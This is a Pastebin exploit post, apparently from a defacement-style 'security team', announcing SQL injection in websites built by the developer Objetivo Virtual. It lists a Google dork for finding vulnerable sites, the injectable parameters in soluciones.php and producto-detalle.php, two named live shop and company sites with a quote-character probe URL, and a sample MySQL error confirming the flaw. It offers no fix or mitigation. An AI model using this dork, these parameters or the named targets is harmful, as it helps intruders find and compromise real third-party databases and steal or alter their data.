KingSkrupellos

Desarrollado por Objetivo Virtual SQL Injection

Jun 4th, 2019
276
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.51 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Desarrollado por Objetivo Virtual SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 05/06/2019
  7. # Vendor Homepage : objetivovirtual.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:Desarrollado por Objetivo Virtual inurl:/producto-detalle.php?id=
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Impact :
  21. ***********
  22. Desarrollado por Objetivo Virtual is prone to an SQL-injection vulnerability because
  23. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  24. Exploiting this issue could allow an attacker to compromise the application, access or
  25. modify data, or exploit latent vulnerabilities in the underlying database.
  26. A remote attacker can send a specially crafted request to the vulnerable application and
  27. execute arbitrary SQL commands in application`s database. Further exploitation of this
  28. vulnerability may result in unauthorized data manipulation.
  29. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  30.  
  31. ###################################################################
  32.  
  33. # SQL Injection Exploit :
  34. **********************
  35. /soluciones.php?IdCat=[SQL Injection]
  36.  
  37. /producto-detalle.php?id=[SQL Injection]
  38.  
  39. ###################################################################
  40.  
  41. # Example Vulnerable Sites :
  42. *************************
  43. [+] industrialcontroles.com.ar/soluciones.php?IdCat=1%27
  44.  
  45. [+] potenzashop.com.ar/producto-detalle.php?id=1%27
  46.  
  47. ###################################################################
  48.  
  49. # Example SQL Database Error :
  50. ****************************
  51. Query: SELECT * FROM categorias WHERE id=
  52. Query Num: 5
  53. Mysql Error: You have an error in your SQL syntax; check the manual that
  54. corresponds to your MySQL server version for the right syntax to use near '' at line 6
  55. Mysql Error NO: 1064
  56.  
  57. ###################################################################
  58.  
  59. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  60.  
  61. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment